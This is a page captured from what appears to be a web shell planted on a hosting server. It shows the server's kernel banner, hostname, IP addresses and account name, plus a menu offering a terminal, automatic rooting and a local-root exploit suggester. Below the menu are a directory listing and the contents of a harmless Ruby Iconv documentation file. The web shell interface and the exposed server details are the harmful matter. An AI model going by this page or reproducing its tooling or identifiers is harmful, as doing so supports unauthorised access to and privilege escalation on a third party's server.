Linux server.edchosting.com 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
LiteSpeed
Server IP : 75.98.162.185 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : goons4good
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby18 /
share /
ri /
1.8 /
system /
Iconv /
Delete
Unzip
Name
Size
Permission
Date
Action
BrokenLibrary
[ DIR ]
drwxr-xr-x
2023-08-27 00:26
Failure
[ DIR ]
drwxr-xr-x
2023-08-27 00:26
IllegalSequence
[ DIR ]
drwxr-xr-x
2023-08-27 00:26
InvalidCharacter
[ DIR ]
drwxr-xr-x
2023-08-27 00:26
InvalidEncoding
[ DIR ]
drwxr-xr-x
2023-08-27 00:26
OutOfRange
[ DIR ]
drwxr-xr-x
2023-08-27 00:26
cdesc-Iconv.yaml
834
B
-rw-r--r--
2023-07-26 09:39
charset_map-c.yaml
293
B
-rw-r--r--
2023-07-26 09:39
close-i.yaml
526
B
-rw-r--r--
2023-07-26 09:39
conv-c.yaml
436
B
-rw-r--r--
2023-07-26 09:39
iconv-c.yaml
888
B
-rw-r--r--
2023-07-26 09:39
iconv-i.yaml
1.72
KB
-rw-r--r--
2023-07-26 09:39
new-c.yaml
1.05
KB
-rw-r--r--
2023-07-26 09:39
open-c.yaml
405
B
-rw-r--r--
2023-07-26 09:39
Save
Rename
--- !ruby/object:RI::MethodDescription aliases: [] block_params: comment: - !ruby/struct:SM::Flow::P body: "Document-method: Iconv::iconv" - !ruby/struct:SM::Flow::P body: Shorthand for - !ruby/struct:SM::Flow::VERB body: " Iconv.open(to, from) { |cd|\n (strs + [nil]).collect { |s| cd.iconv(s) }\n }\n" - !ruby/struct:SM::Flow::H level: 3 text: Parameters - !ruby/object:SM::Flow::LIST contents: - !ruby/struct:SM::Flow::LI label: "<tt>to, from</tt>:" body: see Iconv.new - !ruby/struct:SM::Flow::LI label: "<tt>strs</tt>:" body: strings to be converted type: :NOTE - !ruby/struct:SM::Flow::H level: 3 text: Exceptions - !ruby/struct:SM::Flow::P body: Exceptions thrown by Iconv.new, Iconv.open and Iconv#iconv. full_name: Iconv::iconv is_singleton: true name: iconv params: " Iconv.iconv(to, from, *strs)\n" visibility: public